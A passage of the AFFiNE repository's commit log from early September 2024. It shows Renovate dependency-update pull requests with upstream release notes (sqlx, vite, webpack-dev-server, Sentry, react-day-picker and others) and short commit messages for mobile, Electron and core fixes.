[Compare Source](https://redirect.github.com/serde-rs/json/compare/1.0.127...1.0.128 )
- Support serializing maps containing 128-bit integer keys to serde_json::Value ([#​1188](https://redirect.github.com/serde-rs/json/issues/1188 ), thanks [@​Mrreadiness](https://redirect.github.com/Mrreadiness ))
</details>
<details>
<summary>launchbadge/sqlx (sqlx)</summary>
### [`v0.8.2`](https://redirect.github.com/launchbadge/sqlx/blob/HEAD/CHANGELOG.md#082---2024-09-02 )
[Compare Source](https://redirect.github.com/launchbadge/sqlx/compare/v0.8.1...v0.8.2 )
10 pull requests were merged this release cycle.
This release addresses a few regressions that have occurred, and refines SQLx's MSRV policy (see [the FAQ](FAQ.md)).
##### Added
- \[[#​3447]]: Clarify usage of Json/Jsonb in query macros \[\[[@​Lachstec](https://redirect.github.com/Lachstec )]]
##### Changed
- \[[#​3424]]: Remove deprecated feature-names from `Cargo.toml` files in examples \[\[[@​carschandler](https://redirect.github.com/carschandler )]]
##### Fixed
- \[[#​3403]]: Fix ([#​3395](https://redirect.github.com/launchbadge/sqlx/issues/3395 )) sqlx::test macro in 0.8 \[\[[@​joeydewaal](https://redirect.github.com/joeydewaal )]]
- \[[#​3411]]: fix: Use rfc3339 to decode date from text \[\[[@​pierre-wehbe](https://redirect.github.com/pierre-wehbe )]]
- \[[#​3453]]: fix([#​3445](https://redirect.github.com/launchbadge/sqlx/issues/3445 )): PgHasArrayType \[\[[@​joeydewaal](https://redirect.github.com/joeydewaal )]]
- Fixes `#[sqlx(no_pg_array)]` being forbidden on `#[derive(Type)]` structs.
- \[[#​3454]]: fix: non snake case warning \[\[[@​joeydewaal](https://redirect.github.com/joeydewaal )]]
- \[[#​3459]]: Pgsql cube type compile fail \[\[[@​kdesjard](https://redirect.github.com/kdesjard )]]
- \[[#​3465]]: fix(postgres): max number of binds is 65535, not 32767 (regression) \[\[[@​abonander](https://redirect.github.com/abonander )]]
- \[[#​3467]]: fix cancellation issues with `PgListener`, `PgStream::recv()` \[\[[@​abonander](https://redirect.github.com/abonander )]]
- Fixes cryptic `unknown message: "\\0"` error
- \[[#​3474]]: Fix try_get example in README.md \[\[[@​luveti](https://redirect.github.com/luveti )]]
[#​3403]: https://redirect.github.com/launchbadge/sqlx/pull/3403
[#​3411]: https://redirect.github.com/launchbadge/sqlx/pull/3411
[#​3424]: https://redirect.github.com/launchbadge/sqlx/pull/3424
[#​3447]: https://redirect.github.com/launchbadge/sqlx/pull/3447
[#​3453]: https://redirect.github.com/launchbadge/sqlx/pull/3453
[#​3454]: https://redirect.github.com/launchbadge/sqlx/pull/3454
[#​3455]: https://redirect.github.com/launchbadge/sqlx/pull/3455
[#​3459]: https://redirect.github.com/launchbadge/sqlx/pull/3459
[#​3465]: https://redirect.github.com/launchbadge/sqlx/pull/3465
[#​3467]: https://redirect.github.com/launchbadge/sqlx/pull/3467
[#​3474]: https://redirect.github.com/launchbadge/sqlx/pull/3474
</details>
<details>
<summary>emilkowalski/vaul (vaul)</summary>
### [`v0.9.2`](https://redirect.github.com/emilkowalski/vaul/releases/tag/v0.9.2 )
[Compare Source](https://redirect.github.com/emilkowalski/vaul/compare/v0.9.1...v0.9.2 )
Expect much more updates in the very near future :)
#### What's Changed
- fix(src): Replace `React.useLayoutEffect` with `useIsomorphicLayoutEffect` by [@​axeldesutter](https://redirect.github.com/axeldesutter ) in [https://github.com/emilkowalski/vaul/pull/368 ](https://redirect.github.com/emilkowalski/vaul/pull/368 )
- build: upgrade bundler by [@​huozhi](https://redirect.github.com/huozhi ) in [https://github.com/emilkowalski/vaul/pull/315 ](https://redirect.github.com/emilkowalski/vaul/pull/315 )
- chore: update pnpm by [@​emilkowalski](https://redirect.github.com/emilkowalski ) in [https://github.com/emilkowalski/vaul/pull/401 ](https://redirect.github.com/emilkowalski/vaul/pull/401 )
#### New Contributors
- [@​axeldesutter](https://redirect.github.com/axeldesutter ) made their first contribution in [https://github.com/emilkowalski/vaul/pull/368 ](https://redirect.github.com/emilkowalski/vaul/pull/368 )
**Full Changelog**: https://github.com/emilkowalski/vaul/compare/v0.9.1...v0.9.2
</details>
<details>
<summary>vitejs/vite (vite)</summary>
### [`v5.4.3`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small543-2024-09-03-small )
[Compare Source](https://redirect.github.com/vitejs/vite/compare/v5.4.2...v5.4.3 )
- fix: allow getting URL of JS files in publicDir ([#​17915](https://redirect.github.com/vitejs/vite/issues/17915 )) ([943ece1](943ece177e )), closes [#​17915](https://redirect.github.com/vitejs/vite/issues/17915 )
- fix: cjs warning respect the logLevel flag ([#​17993](https://redirect.github.com/vitejs/vite/issues/17993 )) ([dc3c14f](dc3c14f39f )), closes [#​17993](https://redirect.github.com/vitejs/vite/issues/17993 )
- fix: improve CJS warning trace information ([#​17926](https://redirect.github.com/vitejs/vite/issues/17926 )) ([5c5f82c](5c5f82c84b )), closes [#​17926](https://redirect.github.com/vitejs/vite/issues/17926 )
- fix: only remove entry assets handled by Vite core ([#​17916](https://redirect.github.com/vitejs/vite/issues/17916 )) ([ebfaa7e](ebfaa7e601 )), closes [#​17916](https://redirect.github.com/vitejs/vite/issues/17916 )
- fix: waitForRequestIdle locked ([#​17982](https://redirect.github.com/vitejs/vite/issues/17982 )) ([ad13760](ad1376018a )), closes [#​17982](https://redirect.github.com/vitejs/vite/issues/17982 )
- fix(css): fix directory index import in sass modern api ([#​17960](https://redirect.github.com/vitejs/vite/issues/17960 )) ([9b001ba](9b001baa70 )), closes [#​17960](https://redirect.github.com/vitejs/vite/issues/17960 )
- fix(css): fix sass `file://` reference ([#​17909](https://redirect.github.com/vitejs/vite/issues/17909 )) ([561b940](561b940f6f )), closes [#​17909](https://redirect.github.com/vitejs/vite/issues/17909 )
- fix(css): fix sass modern source map ([#​17938](https://redirect.github.com/vitejs/vite/issues/17938 )) ([d428e7e](d428e7e3a0 )), closes [#​17938](https://redirect.github.com/vitejs/vite/issues/17938 )
- fix(deps): bump tsconfck ([#​17990](https://redirect.github.com/vitejs/vite/issues/17990 )) ([8c661b2](8c661b20e9 )), closes [#​17990](https://redirect.github.com/vitejs/vite/issues/17990 )
- fix(html): rewrite assets url in <template> ([#​17988](https://redirect.github.com/vitejs/vite/issues/17988 )) ([413c86a](413c86aa97 )), closes [#​17988](https://redirect.github.com/vitejs/vite/issues/17988 )
- fix(preload): add crossorigin attribute in CSS link tags ([#​17930](https://redirect.github.com/vitejs/vite/issues/17930 )) ([15871c7](15871c75e0 )), closes [#​17930](https://redirect.github.com/vitejs/vite/issues/17930 )
- chore: reduce diffs with v6 branch ([#​17942](https://redirect.github.com/vitejs/vite/issues/17942 )) ([bf9065a](bf9065aa13 )), closes [#​17942](https://redirect.github.com/vitejs/vite/issues/17942 )
- chore(deps): update all non-major dependencies ([#​17945](https://redirect.github.com/vitejs/vite/issues/17945 )) ([cfb621e](cfb621e7a5 )), closes [#​17945](https://redirect.github.com/vitejs/vite/issues/17945 )
- chore(deps): update all non-major dependencies ([#​17991](https://redirect.github.com/vitejs/vite/issues/17991 )) ([0ca53cf](0ca53cff9f )), closes [#​17991](https://redirect.github.com/vitejs/vite/issues/17991 )
</details>
<details>
<summary>webpack/webpack-dev-server (webpack-dev-server)</summary>
### [`v5.1.0`](https://redirect.github.com/webpack/webpack-dev-server/blob/HEAD/CHANGELOG.md#510-2024-09-03 )
[Compare Source](https://redirect.github.com/webpack/webpack-dev-server/compare/v5.0.4...v5.1.0 )
##### Features
- add visual progress indicators ([a8f40b7](a8f40b74e6 ))
- added the `app` option to be `Function` (by default only with `connect` compatibility frameworks) ([3096148](3096148746 ))
- allow the `server` option to be `Function` ([#​5275](https://redirect.github.com/webpack/webpack-dev-server/issues/5275 )) ([02a1c6d](02a1c6d788 ))
- http2 support for `connect` and `connect` compatibility frameworks which support HTTP2 ([#​5267](https://redirect.github.com/webpack/webpack-dev-server/issues/5267 )) ([6509a3f](6509a3fd3e ))
##### Bug Fixes
- check the `platform` property to determinate the target ([#​5269](https://redirect.github.com/webpack/webpack-dev-server/issues/5269 )) ([c3b532c](c3b532c636 ))
- ipv6 output ([#​5270](https://redirect.github.com/webpack/webpack-dev-server/issues/5270 )) ([06005e7](06005e7cb9 ))
- replace `rimraf` with `rm` ([#​5162](https://redirect.github.com/webpack/webpack-dev-server/issues/5162 )) ([1a1561f](1a1561f09b ))
- replace default gateway ([#​5255](https://redirect.github.com/webpack/webpack-dev-server/issues/5255 )) ([f5f0902](f5f09024ff ))
- support `devServer: false` ([#​5272](https://redirect.github.com/webpack/webpack-dev-server/issues/5272 )) ([8b341cb](8b341cb8c1 ))
##### [5.0.4](https://redirect.github.com/webpack/webpack-dev-server/compare/v5.0.3...v5.0.4 ) (2024-03-19)
##### Bug Fixes
- **security:** bump webpack-dev-middleware ([#​5112](https://redirect.github.com/webpack/webpack-dev-server/issues/5112 )) ([aab576a](aab576a9e4 ))
##### [5.0.3](https://redirect.github.com/webpack/webpack-dev-server/compare/v5.0.2...v5.0.3 ) (2024-03-12)
##### Bug Fixes
- **types:** proxy ([#​5101](https://redirect.github.com/webpack/webpack-dev-server/issues/5101 )) ([6e1aed3](6e1aed30ff ))
##### [5.0.2](https://redirect.github.com/webpack/webpack-dev-server/compare/v5.0.1...v5.0.2 ) (2024-02-16)
##### Bug Fixes
- types ([#​5057](https://redirect.github.com/webpack/webpack-dev-server/issues/5057 )) ([da2c24d](da2c24ddd9 ))
##### [5.0.1](https://redirect.github.com/webpack/webpack-dev-server/compare/v5.0.0...v5.0.1 ) (2024-02-13)
##### Bug Fixes
- avoid using eval in client ([#​5045](https://redirect.github.com/webpack/webpack-dev-server/issues/5045 )) ([7681477](76814771dc ))
- overlay and `require-trusted-types-for` ([#​5046](https://redirect.github.com/webpack/webpack-dev-server/issues/5046 )) ([e115436](e115436771 ))
</details>
<details>
<summary>cloudflare/workers-sdk (wrangler)</summary>
### [`v3.74.0`](https://redirect.github.com/cloudflare/workers-sdk/blob/HEAD/packages/wrangler/CHANGELOG.md#3740 )
[Compare Source](https://redirect.github.com/cloudflare/workers-sdk/compare/wrangler@3.73.0...wrangler@3.74.0 )
##### Minor Changes
- [#​6574](https://redirect.github.com/cloudflare/workers-sdk/pull/6574 ) [`dff8d44`](dff8d44f4e ) Thanks [@​CarmenPopoviciu](https://redirect.github.com/CarmenPopoviciu )! - feat: add support for experimental assets in `wrangler dev` watch mode
##### Patch Changes
- [#​6605](https://redirect.github.com/cloudflare/workers-sdk/pull/6605 ) [`c4f0d9e`](c4f0d9e01e ) Thanks [@​WalshyDev](https://redirect.github.com/WalshyDev )! - fix: ensure we update non-versioned Worker settings for the new deploy path in `wrangler deploy`
- Updated dependencies \[[`e8975a9`](e8975a93a4 )]:
- miniflare@3.20240821 .1
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://redirect.github.com/renovatebot/renovate/discussions ) if that's undesired.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC41OS4yIiwidXBkYXRlZEluVmVyIjoiMzguNTkuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-09-05 03:46:53 +00:00
fundon
2bdf8c6ef3
chore(core): track copy block to link action ( #8056 )
...
part of [BS-1254](https://linear.app/affine-design/issue/BS-1254/增加-block-reference-的埋点 )
2024-09-05 03:21:25 +00:00
LongYinan
c6840c8674
fix(server): wrong mobile root in dev env
2024-09-05 11:18:43 +08:00
akumatus
5f3dd867ad
feat(core): support snapshot preview in editor settings ( #8094 )
...
<div class='graphite__hidden'>
<div>🎥 Video uploaded on Graphite:</div>
<a href="https://app.graphite.dev/media/video/sJGviKxfE3Ap685cl5bj/a991f7d2-f9c6-4241-a24b-b8c01cb86af3.mov ">
<img src="https://app.graphite.dev/api/v1/graphite/video/thumbnail/sJGviKxfE3Ap685cl5bj/a991f7d2-f9c6-4241-a24b-b8c01cb86af3.mov ">
</a>
</div>
<video src="https://graphite-user-uploaded-assets-prod.s3.amazonaws.com/sJGviKxfE3Ap685cl5bj/a991f7d2-f9c6-4241-a24b-b8c01cb86af3.mov ">录屏2024-09-04 22.26.47.mov</video>
2024-09-05 02:58:54 +00:00
pengx17
b680c1839b
fix(core): edit tag should not jump to its detail ( #8070 )
...
fix AF-1324
2024-09-05 02:46:07 +00:00
pengx17
1cac2f6ccd
feat(core): add journal navigation tracking ( #8046 )
...
fix AF-1314
2024-09-05 02:31:58 +00:00
CatsJuice
06552a1120
fix(mobile): explorer node touch optimization ( #8101 )
...
close AF-1338
2024-09-05 02:18:28 +00:00
Yifeng Wang
416faba2bc
chore: support http proxy in bump script ( #8098 )
2024-09-05 10:14:51 +08:00
pengx17
93ae724c66
chore(electron): downgrade electron to v31 ( #8095 )
...
fix AF-1337
it seems the way how we load web worker file in electron no longer works.
created an upstream issue in https://github.com/electron/electron/issues/43556
2024-09-05 01:30:26 +00:00
pengx17
989e8830f7
fix(mobile): workspace selector not close on click outside ( #8096 )
2024-09-04 16:57:57 +00:00
pengx17
0ae5673aaa
feat(electron): add offline mode ( #8086 )
...
fix AF-1334
It seems `session.enableNetworkEmulation({ offline: true });` does not work - https://github.com/electron/electron/issues/21250
implemented using an in-house solution.
When turned on:

2024-09-04 10:46:43 +00:00
CatsJuice
51bc40d2a8
fix(mobile): header will be clipped when modal opened and page scrolled ( #8079 )
...
close AF-1332
This issue is caused by radix, it will set `overflow: hidden` to body when modal opened. And header is implemented with `position: sticky`.
> **why not use `position: fixed` for header?**
>
> We need to handle `padding-top` manually to avoid content covered by header.
2024-09-04 09:36:18 +00:00
EYHN
2524491bd1
fix(env): is mobile flag ( #8005 )
...
only 'mobile' entry has isMobile = true flag
2024-09-04 09:21:36 +00:00
Brooooooklyn
53886a7cd3
fix(server): wrong env variable condition in nginx conf ( #8084 )
2024-09-04 08:57:04 +00:00
JimmFly
f688c057eb
feat(core): impl AI switch ( #8018 )
...
close PD-1658
https://github.com/user-attachments/assets/2f3d1d26-1879-4d95-b80c-7c0965cefbd0
2024-09-04 08:44:05 +00:00
EYHN
eb16c273ee
feat(core): apply default doc mode setting ( #8083 )
2024-09-04 08:31:36 +00:00
EYHN
01b2339173
refactor(core): better block link ( #8082 )
2024-09-04 08:13:22 +00:00
EYHN
2799e8cd43
fix(electron): fix ci ( #8085 )
2024-09-04 08:00:09 +00:00
EYHN
fb64bc7e55
feat(core): indexer upgrade ( #8062 )
2024-09-04 07:31:03 +00:00
EYHN
51f3566bec
fix(core): fix menu bugs ( #8074 )
2024-09-04 07:19:09 +00:00
pengx17
01e6370dd2
fix(electron): use CTRL+= to zoom in on windows ( #8081 )
...
fix AF-1291
2024-09-04 04:23:55 +00:00
pengx17
2ac803c73f
feat(mobile): sign in page ( #8039 )
...
fix AF-1237
2024-09-04 03:58:54 +00:00
CatsJuice
0d6f468385
fix(component): nested modal view-transition support ( #8073 )
...
<div class='graphite__hidden'>
<div>🎥 Video uploaded on Graphite:</div>
<a href="https://app.graphite.dev/media/video/LakojjjzZNf6ogjOVwKE/b8033923-8f08-4c72-96b6-d790fc0ff703.mp4 ">
<img src="https://app.graphite.dev/api/v1/graphite/video/thumbnail/LakojjjzZNf6ogjOVwKE/b8033923-8f08-4c72-96b6-d790fc0ff703.mp4 ">
</a>
</div>
<video src="https://graphite-user-uploaded-assets-prod.s3.amazonaws.com/LakojjjzZNf6ogjOVwKE/b8033923-8f08-4c72-96b6-d790fc0ff703.mp4 ">CleanShot 2024-09-03 at 18.36.17.mp4</video>
2024-09-04 01:29:22 +00:00
CatsJuice
ec3b97d069
fix(component): replace storybook-dark-mode with globalTypes toolbar impl ( #8066 )
2024-09-03 15:18:24 +00:00
pengx17
7dde509970
fix(core): page info modal styles ( #8067 )
2024-09-03 12:46:37 +00:00
Saul-Mirone
681f4561fb
chore: bump bs ( #8071 )
2024-09-03 12:12:59 +00:00
pengx17
d00f86c3ce
fix(core): handle modal overlay click event correctly ( #8063 )
...
1. overlay click + hide is brought back. this is because modal (ormobile menu)'s `onPointerDownOutside` is bound to document.body. Code in e58af08f63/packages/frontend/core/src/modules/explorer/views/tree/node.tsx (L353-L356) will stop the event from bubbling to the document element.
2. when Menu's set to modal=true, the parent is set to pointer-events: none as well. changed menu to modal false instead.

2024-09-03 12:00:00 +00:00
pengx17
ae3b13bfb4
fix(electron): only the active view should respond to CMD+N ( #8068 )
2024-09-03 11:48:06 +00:00
renovate
aad442e73d
chore: bump up @sentry/react version to v8.28.0 ( #8072 )
...
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [@sentry/react](https://redirect.github.com/getsentry/sentry-javascript/tree/master/packages/react ) ([source](https://redirect.github.com/getsentry/sentry-javascript )) | [`8.27.0` -> `8.28.0`](https://renovatebot.com/diffs/npm/@sentry%2freact/8.27.0/8.28.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>getsentry/sentry-javascript (@​sentry/react)</summary>
### [`v8.28.0`](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/8.28.0 )
##### Important Changes
- **Beta release of official NestJS SDK**
This release contains the beta version of `@sentry/nestjs`! For details on how to use it, check out the
[README](https://redirect.github.com/getsentry/sentry-javascript/blob/master/packages/nestjs/README.md ). Any feedback/bug reports
are greatly appreciated, please reach out on GitHub.
- **fix(browser): Remove faulty LCP, FCP and FP normalization logic ([#​13502](https://redirect.github.com/getsentry/sentry-javascript/issues/13502 ))**
This release fixes a bug in the `@sentry/browser` package and all SDKs depending on this package (e.g. `@sentry/react`
or `@sentry/nextjs`) that caused the SDK to send incorrect web vital values for the LCP, FCP and FP vitals. The SDK
previously incorrectly processed the original values as they were reported from the browser. When updating your SDK to
this version, you might experience an increase in LCP, FCP and FP values, which potentially leads to a decrease in your
performance score in the Web Vitals Insights module in Sentry. This is because the previously reported values were
smaller than the actually measured values. We apologize for the inconvenience!
##### Other Changes
- feat(nestjs): Add `SentryGlobalGraphQLFilter` ([#​13545](https://redirect.github.com/getsentry/sentry-javascript/issues/13545 ))
- feat(nestjs): Automatic instrumentation of nestjs interceptors after route execution ([#​13264](https://redirect.github.com/getsentry/sentry-javascript/issues/13264 ))
- feat(nextjs): Add `bundleSizeOptimizations` to build options ([#​13323](https://redirect.github.com/getsentry/sentry-javascript/issues/13323 ))
- feat(nextjs): Stabilize `captureRequestError` ([#​13550](https://redirect.github.com/getsentry/sentry-javascript/issues/13550 ))
- feat(nuxt): Wrap config in nuxt context ([#​13457](https://redirect.github.com/getsentry/sentry-javascript/issues/13457 ))
- feat(profiling): Expose profiler as top level primitive ([#​13512](https://redirect.github.com/getsentry/sentry-javascript/issues/13512 ))
- feat(replay): Add layout shift to CLS replay data ([#​13386](https://redirect.github.com/getsentry/sentry-javascript/issues/13386 ))
- feat(replay): Upgrade rrweb packages to 2.26.0 ([#​13483](https://redirect.github.com/getsentry/sentry-javascript/issues/13483 ))
- fix(cdn): Do not mangle \_metadata ([#​13426](https://redirect.github.com/getsentry/sentry-javascript/issues/13426 ))
- fix(cdn): Fix SDK source for CDN bundles ([#​13475](https://redirect.github.com/getsentry/sentry-javascript/issues/13475 ))
- fix(nestjs): Check arguments before instrumenting with `@Injectable` ([#​13544](https://redirect.github.com/getsentry/sentry-javascript/issues/13544 ))
- fix(nestjs): Ensure exception and host are correctly passed on when using [@​WithSentry](https://redirect.github.com/WithSentry ) ([#​13564](https://redirect.github.com/getsentry/sentry-javascript/issues/13564 ))
- fix(node): Suppress tracing for transport request execution rather than transport creation ([#​13491](https://redirect.github.com/getsentry/sentry-javascript/issues/13491 ))
- fix(replay): Consider more things as DOM mutations for dead clicks ([#​13518](https://redirect.github.com/getsentry/sentry-javascript/issues/13518 ))
- fix(vue): Correctly obtain component name ([#​13484](https://redirect.github.com/getsentry/sentry-javascript/issues/13484 ))
Work in this release was contributed by [@​leopoldkristjansson](https://redirect.github.com/leopoldkristjansson ), [@​mhuggins](https://redirect.github.com/mhuggins ) and [@​filips123](https://redirect.github.com/filips123 ). Thank you for your
contributions!
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about these updates again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC41OS4yIiwidXBkYXRlZEluVmVyIjoiMzguNTkuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-09-03 11:35:00 +00:00
renovate
4595df9b0e
chore: bump up react-day-picker version to v9 ( #7559 )
...
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [react-day-picker](https://daypicker.dev ) ([source](https://redirect.github.com/gpbl/react-day-picker )) | [`^8.10.1` -> `^9.0.0`](https://renovatebot.com/diffs/npm/react-day-picker/8.10.1/9.0.8 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>gpbl/react-day-picker (react-day-picker)</summary>
### [`v9.0.8`](https://redirect.github.com/gpbl/react-day-picker/releases/tag/v9.0.8 )
[Compare Source](https://redirect.github.com/gpbl/react-day-picker/compare/v9.0.7...v9.0.8 )
This release fixes a regression in v9.0.7 affecting range mode.
#### What's Changed
- fix: update the displayed month only if start/end month change by [@​gpbl](https://redirect.github.com/gpbl ) in [https://github.com/gpbl/react-day-picker/pull/2358 ](https://redirect.github.com/gpbl/react-day-picker/pull/2358 )
**Full Changelog**: https://github.com/gpbl/react-day-picker/compare/v9.0.7...v9.0.8
### [`v9.0.7`](https://redirect.github.com/gpbl/react-day-picker/releases/tag/v9.0.7 )
[Compare Source](https://redirect.github.com/gpbl/react-day-picker/compare/v9.0.6...v9.0.7 )
This release improves compatibility with v8 and fix an issue with the calendar navigation.
#### What's Changed
- fix: update calendar state when `startMonth` or `endMonth` change by [@​gpbl](https://redirect.github.com/gpbl ) in [https://github.com/gpbl/react-day-picker/pull/2343 ](https://redirect.github.com/gpbl/react-day-picker/pull/2343 )
- feat: allow partial locales, export `defaultLocale` by [@​gpbl](https://redirect.github.com/gpbl ) in [https://github.com/gpbl/react-day-picker/pull/2348 ](https://redirect.github.com/gpbl/react-day-picker/pull/2348 )
- feat: allow `undefined` as initially selected value, as it was in v8 by [@​gpbl](https://redirect.github.com/gpbl ) in [https://github.com/gpbl/react-day-picker/pull/2341 ](https://redirect.github.com/gpbl/react-day-picker/pull/2341 )
- docs: changed class name `calendar` to `root` in the examples by [@​gpbl](https://redirect.github.com/gpbl ) in [https://github.com/gpbl/react-day-picker/pull/2347 ](https://redirect.github.com/gpbl/react-day-picker/pull/2347 )
- docs: replaced deprecated props by [@​josephmarkus](https://redirect.github.com/josephmarkus ) in [https://github.com/gpbl/react-day-picker/pull/2336 ](https://redirect.github.com/gpbl/react-day-picker/pull/2336 )\*
#### New Contributors
- [@​josephmarkus](https://redirect.github.com/josephmarkus ) made their first contribution in [https://github.com/gpbl/react-day-picker/pull/2336 ](https://redirect.github.com/gpbl/react-day-picker/pull/2336 )
**Full Changelog**: https://github.com/gpbl/react-day-picker/compare/v9.0.6...v9.0.7
### [`v9.0.6`](https://redirect.github.com/gpbl/react-day-picker/releases/tag/v9.0.6 )
[Compare Source](https://redirect.github.com/gpbl/react-day-picker/compare/v9.0.5...v9.0.6 )
This release addresses the failed import of the common-js module for some app builder and add new `data-` attributes to help the integration with Tailwind. Thanks for your feedback!
#### What's Changed
- fix(build): add package.json to dist/cjs module by [@​gpbl](https://redirect.github.com/gpbl ) in [https://github.com/gpbl/react-day-picker/pull/2330 ](https://redirect.github.com/gpbl/react-day-picker/pull/2330 )
- feat: add new data-attributes to the day cells by [@​gpbl](https://redirect.github.com/gpbl ) in [https://github.com/gpbl/react-day-picker/pull/2331 ](https://redirect.github.com/gpbl/react-day-picker/pull/2331 )
#### New Contributors
- [@​lesleh](https://redirect.github.com/lesleh ) made their first contribution in [https://github.com/gpbl/react-day-picker/pull/2329 ](https://redirect.github.com/gpbl/react-day-picker/pull/2329 )
**Full Changelog**: https://github.com/gpbl/react-day-picker/compare/v9.0.5...v9.0.6
### [`v9.0.5`](https://redirect.github.com/gpbl/react-day-picker/releases/tag/v9.0.5 )
[Compare Source](https://redirect.github.com/gpbl/react-day-picker/compare/v9.0.4...v9.0.5 )
This release improves the range mode behavior (see the [updated docs](https://daypicker.dev/docs/selection-modes#range-mode )) and address some styling issues.
#### What's Changed
- fix: improved range mode to work with min / required props by [@​gpbl](https://redirect.github.com/gpbl ) in [https://github.com/gpbl/react-day-picker/pull/2326 ](https://redirect.github.com/gpbl/react-day-picker/pull/2326 )
- fix(style): typo in css rdp-hidden module css breaking CSS builds by [@​ayuhito](https://redirect.github.com/ayuhito ) in [https://github.com/gpbl/react-day-picker/pull/2307 ](https://redirect.github.com/gpbl/react-day-picker/pull/2307 )
- fix(style): borders grid are not collapsed by [@​gpbl](https://redirect.github.com/gpbl ) in [https://github.com/gpbl/react-day-picker/pull/2323 ](https://redirect.github.com/gpbl/react-day-picker/pull/2323 )
- fix(style): week numbers are now centered by [@​gpbl](https://redirect.github.com/gpbl ) in c919ad829c
#### New Contributors
- [@​ayuhito](https://redirect.github.com/ayuhito ) made their first contribution in [https://github.com/gpbl/react-day-picker/pull/2307 ](https://redirect.github.com/gpbl/react-day-picker/pull/2307 )
- [@​rishabh-ink](https://redirect.github.com/rishabh-ink ) made their first contribution in [https://github.com/gpbl/react-day-picker/pull/2311 ](https://redirect.github.com/gpbl/react-day-picker/pull/2311 )
**Full Changelog**: https://github.com/gpbl/react-day-picker/compare/v9.0.4...v9.0.5
### [`v9.0.4`](https://redirect.github.com/gpbl/react-day-picker/releases/tag/v9.0.4 )
[Compare Source](https://redirect.github.com/gpbl/react-day-picker/compare/v9.0.3...v9.0.4 )
This release fixes some bugs and improves compatibility with v8.10. Thanks for your feedback and patience! 🤖
#### What's Changed
- fix(css): typo in `.rdp-range_end` by [@​AlessioDP](https://redirect.github.com/AlessioDP ) in [https://github.com/gpbl/react-day-picker/pull/2298 ](https://redirect.github.com/gpbl/react-day-picker/pull/2298 )
- fix(css): dropdown is transparent in Windows OS by [@​gpbl](https://redirect.github.com/gpbl ) in [https://github.com/gpbl/react-day-picker/pull/2300 ](https://redirect.github.com/gpbl/react-day-picker/pull/2300 )
- fix: `endMonth` date not working as expected by [@​gpbl](https://redirect.github.com/gpbl ) in [https://github.com/gpbl/react-day-picker/pull/2301 ](https://redirect.github.com/gpbl/react-day-picker/pull/2301 )
- feat: added back `onDayMouseEnter` and `onDayMouseLeave` by [@​gpbl](https://redirect.github.com/gpbl ) in [https://github.com/gpbl/react-day-picker/pull/2304 ](https://redirect.github.com/gpbl/react-day-picker/pull/2304 )
#### New Contributors
- [@​AlessioDP](https://redirect.github.com/AlessioDP ) made their first contribution in [https://github.com/gpbl/react-day-picker/pull/2298 ](https://redirect.github.com/gpbl/react-day-picker/pull/2298 )
**Full Changelog**: https://github.com/gpbl/react-day-picker/compare/v9.0.3...v9.0.4
### [`v9.0.3`](https://redirect.github.com/gpbl/react-day-picker/releases/tag/v9.0.3 )
[Compare Source](https://redirect.github.com/gpbl/react-day-picker/compare/v9.0.2...v9.0.3 )
This release fixes two issues found with the grid style and the range mode.
#### What's Changed
- fix: alignment of grid elements by [@​gpbl](https://redirect.github.com/gpbl ) in [https://github.com/gpbl/react-day-picker/pull/2294 ](https://redirect.github.com/gpbl/react-day-picker/pull/2294 )
- fix: range mode not updating when selected prop changes by [@​gpbl](https://redirect.github.com/gpbl ) in [https://github.com/gpbl/react-day-picker/pull/2295 ](https://redirect.github.com/gpbl/react-day-picker/pull/2295 )
**Full Changelog**: https://github.com/gpbl/react-day-picker/compare/v9.0.2...v9.0.3
### [`v9.0.2`](https://redirect.github.com/gpbl/react-day-picker/releases/tag/v9.0.2 )
[Compare Source](https://redirect.github.com/gpbl/react-day-picker/compare/v9.0.1...v9.0.2 )
This update improves backward compatibility with v8.10.1 for range selection mode.
#### What's Changed
- feat: add `excludeDisabled` prop for range mode by [@​gpbl](https://redirect.github.com/gpbl ) in [https://github.com/gpbl/react-day-picker/pull/2290 ](https://redirect.github.com/gpbl/react-day-picker/pull/2290 )
**Full Changelog**: https://github.com/gpbl/react-day-picker/compare/v9.0.1...v9.0.2
### [`v9.0.1`](https://redirect.github.com/gpbl/react-day-picker/releases/tag/v9.0.1 )
[Compare Source](https://redirect.github.com/gpbl/react-day-picker/compare/v9.0.0...v9.0.1 )
